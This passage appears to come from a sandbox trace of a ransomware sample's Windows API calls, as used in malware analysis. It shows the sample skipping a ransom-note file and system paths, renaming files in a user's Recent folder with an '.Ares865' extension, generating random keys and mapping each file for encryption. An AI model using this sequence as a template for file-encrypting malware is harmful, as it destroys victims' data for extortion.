dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0093.008] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0093.008] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0093.008] CloseHandle (hObject=0x15c) returned 1 [0093.008] CloseHandle (hObject=0x118) returned 1 [0093.012] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0093.012] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0093.012] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0093.012] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3d49dfe0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x3d49dfe0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x3d49dfe0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xe75, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="36TS.lnk", cAlternateFileName="")) returned 1 [0093.012] lstrcmpiW (lpString1="36TS.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0093.012] lstrcmpiW (lpString1="36TS.lnk", lpString2="aoldtz.exe") returned -1 [0093.012] lstrcmpiW (lpString1="36TS.lnk", lpString2=".") returned 1 [0093.012] lstrcmpiW (lpString1="36TS.lnk", lpString2="..") returned 1 [0093.012] lstrcmpiW (lpString1="36TS.lnk", lpString2="windows") returned -1 [0093.012] lstrcmpiW (lpString1="36TS.lnk", lpString2="bootmgr") returned -1 [0093.012] lstrcmpiW (lpString1="36TS.lnk", lpString2="temp") returned -1 [0093.012] lstrcmpiW (lpString1="36TS.lnk", lpString2="pagefile.sys") returned -1 [0093.012] lstrcmpiW (lpString1="36TS.lnk", lpString2="boot") returned -1 [0093.012] lstrcmpiW (lpString1="36TS.lnk", lpString2="ids.txt") returned -1 [0093.012] lstrcmpiW (lpString1="36TS.lnk", lpString2="ntuser.dat") returned -1 [0093.012] lstrcmpiW (lpString1="36TS.lnk", lpString2="perflogs") returned -1 [0093.013] lstrcmpiW (lpString1="36TS.lnk", lpString2="MSBuild") returned -1 [0093.013] lstrlenW (lpString="36TS.lnk") returned 8 [0093.013] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\2Qrv6OWl.lnk") returned 49 [0093.013] lstrcpyW (in: lpString1=0x2cce44a, lpString2="36TS.lnk" | out: lpString1="36TS.lnk") returned="36TS.lnk" [0093.013] lstrlenW (lpString="36TS.lnk") returned 8 [0093.013] lstrlenW (lpString="Ares865") returned 7 [0093.013] lstrcmpiW (lpString1="6TS.lnk", lpString2="Ares865") returned -1 [0093.013] lstrlenW (lpString=".dll") returned 4 [0093.013] lstrcmpiW (lpString1="36TS.lnk", lpString2=".dll") returned 1 [0093.013] lstrlenW (lpString=".lnk") returned 4 [0093.013] lstrcmpiW (lpString1="36TS.lnk", lpString2=".lnk") returned 1 [0093.013] lstrlenW (lpString=".ini") returned 4 [0093.013] lstrcmpiW (lpString1="36TS.lnk", lpString2=".ini") returned 1 [0093.013] lstrlenW (lpString=".sys") returned 4 [0093.013] lstrcmpiW (lpString1="36TS.lnk", lpString2=".sys") returned 1 [0093.013] lstrlenW (lpString="36TS.lnk") returned 8 [0093.013] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\36TS.lnk.Ares865") returned 53 [0093.013] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\36TS.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\36ts.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\36TS.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\36ts.lnk.ares865"), dwFlags=0x1) returned 1 [0093.014] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\36TS.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\36ts.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.014] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3701) returned 1 [0093.014] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0093.015] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0093.015] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0093.015] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.016] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.016] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.016] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1180, lpName=0x0) returned 0x15c [0093.016] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1180) returned 0x190000 [0093.016] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.017] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.017] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.017] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0093.017] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0093.017] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0093.017] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0093.017] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0093.017] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0093.017] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0093.018] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0093.018] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0093.018] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0093.018] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0093.018] CloseHandle (hObject=0x15c) returned 1 [0093.018] CloseHandle (hObject=0x118) returned 1 [0093.019] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0093.019] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0093.019] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0093.019] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3d87c3a0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x3d87c3a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x3d87c3a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x23e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3I5UVmK8q.lnk", cAlternateFileName="3I5UVM~1.LNK")) returned 1 [0093.019] lstrcmpiW (lpString1="3I5UVmK8q.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0093.019] lstrcmpiW (lpString1="3I5UVmK8q.lnk", lpString2="aoldtz.exe") returned -1 [0093.019] lstrcmpiW (lpString1="3I5UVmK8q.lnk", lpString2=".") returned 1 [0093.019] lstrcmpiW (lpString1="3I5UVmK8q.lnk", lpString2="..") returned 1 [0093.019] lstrcmpiW (lpString1="3I5UVmK8q.lnk", lpString2="windows") returned -1 [0093.019] lstrcmpiW (lpString1="3I5UVmK8q.lnk", lpString2="bootmgr") returned -1 [0093.019] lstrcmpiW (lpString1="3I5UVmK8q.lnk", lpString2="temp") returned -1 [0093.019] lstrcmpiW (lpString1="3I5UVmK8q.lnk", lpString2="pagefile.sys") returned -1 [0093.019] lstrcmpiW (lpString1="3I5UVmK8q.lnk", lpString2="boot") returned -1 [0093.019] lstrcmpiW (lpString1="3I5UVmK8q.lnk", lpString2="ids.txt") returned -1 [0093.019] lstrcmpiW (lpString1="3I5UVmK8q.lnk", lpString2="ntuser.dat") returned -1 [0093.019] lstrcmpiW (lpString1="3I5UVmK8q.lnk", lpString2="perflogs") returned -1 [0093.019] lstrcmpiW (lpString1="3I5UVmK8q.lnk", lpString2="MSBuild") returned -1 [0093.019] lstrlenW (lpString="3I5UVmK8q.lnk") returned 13 [0093.020] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\36TS.lnk") returned 45 [0093.020] lstrcpyW (in: lpString1=0x2cce44a, lpString2="3I5UVmK8q.lnk" | out: lpString1="3I5UVmK8q.lnk") returned="3I5UVmK8q.lnk" [0093.020] lstrlenW (lpString="3I5UVmK8q.lnk") returned 13 [0093.020] lstrlenW (lpString="Ares865") returned 7 [0093.020] lstrcmpiW (lpString1="K8q.lnk", lpString2="Ares865") returned 1 [0093.020] lstrlenW (lpString=".dll") returned 4 [0093.020] lstrcmpiW (lpString1="3I5UVmK8q.lnk", lpString2=".dll") returned 1 [0093.020] lstrlenW (lpString=".lnk") returned 4 [0093.020] lstrcmpiW (lpString1="3I5UVmK8q.lnk", lpString2=".lnk") returned 1 [0093.020] lstrlenW (lpString=".ini") returned 4 [0093.020] lstrcmpiW (lpString1="3I5UVmK8q.lnk", lpString2=".ini") returned 1 [0093.020] lstrlenW (lpString=".sys") returned 4 [0093.020] lstrcmpiW (lpString1="3I5UVmK8q.lnk", lpString2=".sys") returned 1 [0093.020] lstrlenW (lpString="3I5UVmK8q.lnk") returned 13 [0093.020] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\3I5UVmK8q.lnk.Ares865") returned 58 [0093.020] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\3I5UVmK8q.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\3i5uvmk8q.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\3I5UVmK8q.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\3i5uvmk8q.lnk.ares865"), dwFlags=0x1) returned 1 [0093.021] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\3I5UVmK8q.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\3i5uvmk8q.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.021] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=574) returned 1 [0093.021] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0093.022] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0093.022] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0093.022] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.022] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.023] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.023] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x540, lpName=0x0) returned 0x15c [0093.024] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x540) returned 0x190000 [0093.024] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.024] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.024] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.025] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0093.025] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0093.025] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0093.025] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0093.025] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0093.025] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0093.025] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0093.025] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0093.025] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0093.025] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0093.025] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0093.025] CloseHandle (hObject=0x15c) returned 1 [0093.025] CloseHandle (hObject=0x118) returned 1 [0093.026] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0093.026] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0093.026] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0093.026] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3d6b3320, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x3d6b3320, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x3d6b3320, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x3ed, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="43mfdkhT.lnk", cAlternateFileName="")) returned 1 [0093.026] lstrcmpiW (lpString1="43mfdkhT.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0093.026] lstrcmpiW (lpString1="43mfdkhT.lnk", lpString2="aoldtz.exe") returned -1 [0093.026] lstrcmpiW (lpString1="43mfdkhT.lnk", lpString2=".") returned 1 [0093.026] lstrcmpiW (lpString1="43mfdkhT.lnk", lpString2="..") returned 1 [0093.026] lstrcmpiW (lpString1="43mfdkhT.lnk", lpString2="windows") returned -1 [0093.026] lstrcmpiW (lpString1="43mfdkhT.lnk", lpString2="bootmgr") returned -1 [0093.026] lstrcmpiW (lpString1="43mfdkhT.lnk", lpString2="temp") returned -1 [0093.027] lstrcmpiW (lpString1="43mfdkhT.lnk", lpString2="pagefile.sys") returned -1 [0093.027] lstrcmpiW (lpString1="43mfdkhT.lnk", lpString2="boot") returned -1 [0093.027] lstrcmpiW (lpString1="43mfdkhT.lnk", lpString2="ids.txt") returned -1 [0093.027] lstrcmpiW (lpString1="43mfdkhT.lnk", lpString2="ntuser.dat") returned -1 [0093.027] lstrcmpiW (lpString1="43mfdkhT.lnk", lpString2="perflogs") returned -1 [0093.027] lstrcmpiW (lpString1="43mfdkhT.lnk", lpString2="MSBuild") returned -1 [0093.027] lstrlenW (lpString="43mfdkhT.lnk") returned 12 [0093.027] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\3I5UVmK8q.lnk") returned 50 [0093.027] lstrcpyW (in: lpString1=0x2cce44a, lpString2="43mfdkhT.lnk" | out: lpString1="43mfdkhT.lnk") returned="43mfdkhT.lnk" [0093.027] lstrlenW (lpString="43mfdkhT.lnk") returned 12 [0093.027] lstrlenW (lpString="Ares865") returned 7 [0093.027] lstrcmpiW (lpString1="khT.lnk", lpString2="Ares865") returned 1 [0093.027] lstrlenW (lpString=".dll") returned 4 [0093.027] lstrcmpiW (lpString1="43mfdkhT.lnk", lpString2=".dll") returned 1 [0093.027] lstrlenW (lpString=".lnk") returned 4 [0093.027] lstrcmpiW (lpString1="43mfdkhT.lnk", lpString2=".lnk") returned 1 [0093.027] lstrlenW (lpString=".ini") returned 4 [0093.027] lstrcmpiW (lpString1="43mfdkhT.lnk", lpString2=".ini") returned 1 [0093.027] lstrlenW (lpString=".sys") returned 4 [0093.027] lstrcmpiW (lpString1="43mfdkhT.lnk", lpString2=".sys") returned 1 [0093.027] lstrlenW (lpString="43mfdkhT.lnk") returned 12 [0093.027] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\43mfdkhT.lnk.Ares865") returned 57 [0093.027] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\43mfdkhT.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\43mfdkht.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\43mfdkhT.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\43mfdkht.lnk.ares865"), dwFlags=0x1) returned 1 [0093.028] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\43mfdkhT.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\43mfdkht.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.029] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1005) returned 1 [0093.029] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0093.029] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0093.029] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0093.029] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.030] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.030] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.030] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6f0, lpName=0x0) returned 0x15c [0093.030] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6f0) returned 0x190000 [0093.030] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.031] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.031] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.031] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0093.031] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0093.031] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0093.031] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0093.031] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0093.031] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0093.031] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0093.032] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0093.032] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0093.032] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0093.032] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0093.032] CloseHandle (hObject=0x15c) returned 1 [0093.032] CloseHandle (hObject=0x118) returned 1 [0093.033] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0093.033] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0093.033] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0093.033] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3da45420, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x3da45420, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x3da45420, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1a1a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4EVHeN.lnk", cAlternateFileName="")) returned 1 [0093.033] lstrcmpiW (lpString1="4EVHeN.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0093.033] lstrcmpiW (lpString1="4EVHeN.lnk", lpString2="aoldtz.exe") returned -1 [0093.033] lstrcmpiW (lpString1="4EVHeN.lnk", lpString2=".") returned 1 [0093.033] lstrcmpiW (lpString1="4EVHeN.lnk", lpString2="..") returned 1 [0093.033] lstrcmpiW (lpString1="4EVHeN.lnk", lpString2="windows") returned -1 [0093.034] lstrcmpiW (lpString1="4EVHeN.lnk", lpString2="bootmgr") returned -1 [0093.034] lstrcmpiW (lpString1="4EVHeN.lnk", lpString2="temp") returned -1 [0093.034] lstrcmpiW (lpString1="4EVHeN.lnk", lpString2="pagefile.sys") returned -1 [0093.034] lstrcmpiW (lpString1="4EVHeN.lnk", lpString2="boot") returned -1 [0093.034] lstrcmpiW (lpString1="4EVHeN.lnk", lpString2="ids.txt") returned -1 [0093.034] lstrcmpiW (lpString1="4EVHeN.lnk", lpString2="ntuser.dat") returned -1 [0093.034] lstrcmpiW (lpString1="4EVHeN.lnk", lpString2="perflogs") returned -1 [0093.034] lstrcmpiW (lpString1="4EVHeN.lnk", lpString2="MSBuild") returned -1 [0093.034] lstrlenW (lpString="4EVHeN.lnk") returned 10 [0093.034] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\43mfdkhT.lnk") returned 49 [0093.034] lstrcpyW (in: lpString1=0x2cce44a, lpString2="4EVHeN.lnk" | out: lpString1="4EVHeN.lnk") returned="4EVHeN.lnk" [0093.034] lstrlenW (lpString="4EVHeN.lnk") returned 10 [0093.034] lstrlenW (lpString="Ares865") returned 7 [0093.034] lstrcmpiW (lpString1="HeN.lnk", lpString2="Ares865") returned 1 [0093.034] lstrlenW (lpString=".dll") returned 4 [0093.034] lstrcmpiW (lpString1="4EVHeN.lnk", lpString2=".dll") returned 1 [0093.034] lstrlenW (lpString=".lnk") returned 4 [0093.034] lstrcmpiW (lpString1="4EVHeN.lnk", lpString2=".lnk") returned 1 [0093.034] lstrlenW (lpString=".ini") returned 4 [0093.034] lstrcmpiW (lpString1="4EVHeN.lnk", lpString2=".ini") returned 1 [0093.034] lstrlenW (lpString=".sys") returned 4 [0093.034] lstrcmpiW (lpString1="4EVHeN.lnk", lpString2=".sys") returned 1 [0093.034] lstrlenW (lpString="4EVHeN.lnk") returned 10 [0093.034] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\4EVHeN.lnk.Ares865") returned 55 [0093.034] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\4EVHeN.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\4evhen.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\4EVHeN.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\4evhen.lnk.ares865"), dwFlags=0x1) returned 1 [0093.035] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\4EVHeN.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\4evhen.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.036] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=6682) returned 1 [0093.036] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0093.036] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0093.036] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0093.036] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.037] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.037] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.037] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1d20, lpName=0x0) returned 0x15c [0093.037] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1d20) returned 0x190000 [0093.037] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.038] CryptGenRandom (in: hProv=0x2f0518, 